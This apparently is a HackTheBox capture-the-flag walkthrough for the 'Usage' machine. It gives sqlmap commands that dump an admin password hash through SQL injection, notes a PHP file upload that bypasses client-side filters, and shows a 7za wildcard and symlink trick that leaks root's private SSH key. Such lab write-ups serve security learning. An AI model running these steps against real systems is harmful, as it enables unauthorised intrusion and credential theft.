Usage — HackTheBox
NMAP
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
|_ 256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80 (HTTP)
Navigating the web application, we find a SQL injection in the reset-user-password endpoint. Exploit it using sqlmap and dump the tables in the usage_blog database.
sqlmap -r reset-user.req --risk=3 --level=5 -p email --batch --dump -o
Dump the columns in the admin_users table.
sqlmap -r reset-user.req --risk=3 --level=5 -p email --batch -D usage_blog -T admin_users --dump -o
Dump the admin_users table to get the admin hash.
sqlmap -r reset-user.req --risk=3 --level=5 -p email --batch -D usage_blog -T admin_users -C name,username,password --dump -o
Now crack the hash using hashcat to get the admin user's password.
Log in using the cracked password.
Go to the admin dashboard and open the settings. Upload the PHP file, intercepting the request to bypass the client-side filters.
For the user, check the .monitrc file in the user's home directory for a password.
Use the password to log in as the xander user.
Privilege Escalation
Checking sudo permissions, the xander user can run usage_management.
Checking strings, it seems to run the 7za command with a wildcard (*).
Searching on Google, this seems exploitable to read arbitrary files by forcing an error.
Following the steps above, we can read the root user's private SSH key.
cd /var/www/html
touch @uwu
ln -sf /root/.ssh/id_rsa
Now run usage_management with sudo and select Project Backup from the options. It will print the SSH key in the errors.
sudo /usr/bin/usage_management
Put the SSH key in a file, make sure it has a blank line at the end and permissions of 600. Now use the SSH key to log in as root.
Thanks for reading.